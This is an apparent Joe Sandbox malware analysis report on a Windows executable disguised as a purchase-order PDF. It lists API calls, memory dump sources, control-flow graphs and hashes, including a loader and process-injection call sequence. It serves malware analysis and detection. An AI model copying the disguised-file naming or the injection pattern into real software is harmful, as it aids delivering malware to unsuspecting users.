• API ID: _wcscpy$DesktopFolderFromListMallocPath
• String ID: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
• API String ID: 192938534-3537542610
• Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
• Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
• Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
• Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6

Control-flow Graph (interactive graph not reproduced)
APIs
• _memset.LIBCMT ref: 00401257
  • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
  • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
  • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
  • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
• KillTimer.USER32(?,?), ref: 004012B0
• SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
• Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1792922140-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                                                                                                                                                                                                                                            • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB

Control-flow Graph

• Graph: function at 553d5f0 (nodes 1370-1423); subcalls 553b030, 553e500, 553e750, 553e560; API nodes CreateFileW, VirtualAlloc, ReadFile, CloseHandle, VirtualFree (graph image not recoverable as text)
APIs
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0553D6C1
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0553D8E7
Memory Dump Source
• Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CreateFileFreeVirtual
• String ID:
• API String ID: 204039940-0
• Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
• Instruction ID: 756c383d595ba48c5b9c65f0c46cd10ad7d6db92ee7fa2736fef32dacb03c7e3
• Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
• Instruction Fuzzy Hash: 40A10874E00209EBDB14CFA4C895BEEFBB6BF48304F208559E519BB280D775AA45CF94

Control-flow Graph

• Graph: function at 414f10 (nodes 1424-1495); internal subcalls only (417f23, 417ebb, 4131f0, 41e6b1, 41ee9b, 41453a, 41ed9e), no API nodes (graph image not recoverable as text)
APIs
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
• String ID:
• API String ID: 3886058894-0
• Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
• Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
• Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
• Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99

Control-flow Graph

• Graph: single node 1496, function at 4103e0-410461; API nodes CreateWindowExW * 2, ShowWindow * 2
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
• ShowWindow.USER32(?,00000000), ref: 00410454
• ShowWindow.USER32(?,00000000), ref: 0041045E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                                            • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                                            • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                                            • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                                                                                                                                                                                                            • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C

Control-flow Graph

control_flow_graph 1497 553d3e0-553d4e5 call 553b030 call 553d2d0 CreateFileW 1504 553d4e7 1497->1504 1505 553d4ec-553d4fc 1497->1505 1506 553d59c-553d5a1 1504->1506 1508 553d503-553d51d VirtualAlloc 1505->1508 1509 553d4fe 1505->1509 1510 553d521-553d538 ReadFile 1508->1510 1511 553d51f 1508->1511 1509->1506 1512 553d53a 1510->1512 1513 553d53c-553d576 call 553d310 call 553c2d0 1510->1513 1511->1506 1512->1506 1518 553d592-553d59a ExitProcess 1513->1518 1519 553d578-553d58d call 553d360 1513->1519 1518->1506 1519->1518
APIs
  • Part of subcall function 0553D2D0: Sleep.KERNELBASE(000001F4), ref: 0553D2E1
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0553D4DB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: YU5WTYH0ADM
• API String ID: 2694422964-2241810282
• Opcode ID: 4ec3ee32b0af857ee5d1071e7b73bfe09baff6b11c1a36a0a1ffc8c7d6880dc7
• Instruction ID: de37749d4bfb594255f61b87b06a4a170163cc5e10d93ec3c4e3111d9fdebded
• Opcode Fuzzy Hash: 4ec3ee32b0af857ee5d1071e7b73bfe09baff6b11c1a36a0a1ffc8c7d6880dc7
• Instruction Fuzzy Hash: 52516C31E04249EAEF10DBE4C819BEFBB79AF48304F004599E619BB2C0DA755B44CBA5

Control-flow Graph

control_flow_graph 1521 413a88-413a99 call 41718c 1524 413b10-413b15 call 4171d1 1521->1524 1525 413a9b-413aa2 1521->1525 1526 413aa4-413abc call 418407 call 419f6d 1525->1526 1527 413ae7 1525->1527 1539 413ac7-413ad7 call 413ade 1526->1539 1540 413abe-413ac6 call 419f9d 1526->1540 1529 413ae8-413af8 RtlFreeHeap 1527->1529 1529->1524 1532 413afa-413b0f call 417f23 GetLastError call 417ee1 1529->1532 1532->1524 1539->1524 1546 413ad9-413adc 1539->1546 1540->1539 1546->1529
APIs
• __lock.LIBCMT ref: 00413AA6
  • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
  • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
  • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
• ___sbh_find_block.LIBCMT ref: 00413AB1
• ___sbh_free_block.LIBCMT ref: 00413AC0
• RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
• GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
• String ID:
• API String ID: 2714421763-0
• Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
• Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
• Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
• Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C

Control-flow Graph

control_flow_graph 1547 40f5e0-40f62f call 40f580 call 413990 call 4112ef call 40f6a0 call 40f6d0 1558 40f631-40f653 1547->1558 1558->1558 1559 40f655-40f66d call 414e06 1558->1559 1562 40f673-40f67b call 40f450 1559->1562 1563 42b2ee 1559->1563 1566 42b2f8-42b322 call 4151b0 call 44afdc 1562->1566 1567 40f681-40f695 call 414e94 1562->1567 1563->1566 1574 42b324-42b330 1566->1574 1574->1574 1575 42b332-42b338 call 415484 1574->1575 1577 42b33d-42b343 1575->1577
APIs
  • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
  • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
  • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
• _strcat.LIBCMT ref: 0040F603
  • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
  • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
Strings
Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: HH
                                                                                                                                                                                                                                                                                                            • API String ID: 1194219731-2761332787
                                                                                                                                                                                                                                                                                                            • Opcode ID: 0ca74ca22c93bbdecf3c61efd9645c69edf031a3cdd9ada680c74e67e1c8a1c6
                                                                                                                                                                                                                                                                                                            • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ca74ca22c93bbdecf3c61efd9645c69edf031a3cdd9ada680c74e67e1c8a1c6
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 0553CA8B
                                                                                                                                                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0553CB21
                                                                                                                                                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0553CB43
                                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 0553CE4C
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 572931308-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: c5347b81de31fe322318ac143d5ad7503c5525a24d4d98ae8bc56a200060b54f
                                                                                                                                                                                                                                                                                                            • Instruction ID: dd1ecfe155c6534f835749160517ea1ace67e84d6524617e4432aeaf56d9b50d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5347b81de31fe322318ac143d5ad7503c5525a24d4d98ae8bc56a200060b54f
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB620A30A14258DBEB24CFA4C851BEEB376FF58300F1095A9D10DEB290E7799E85CB59
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                                                                                                                                                                                                            • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                                                                                                                                                                                                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1411284514-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                                                                                                                                                                                                                            • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                                                                                                                                                                                                            • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
APIs
• RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
• RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
• RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
• Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
• Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
• Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
APIs
• _malloc.LIBCMT ref: 00435278
  • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
  • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
  • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
• _malloc.LIBCMT ref: 00435288
• _malloc.LIBCMT ref: 00435298
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: _malloc$AllocateHeap
• String ID:
• API String ID: 680241177-0
• Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
• Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
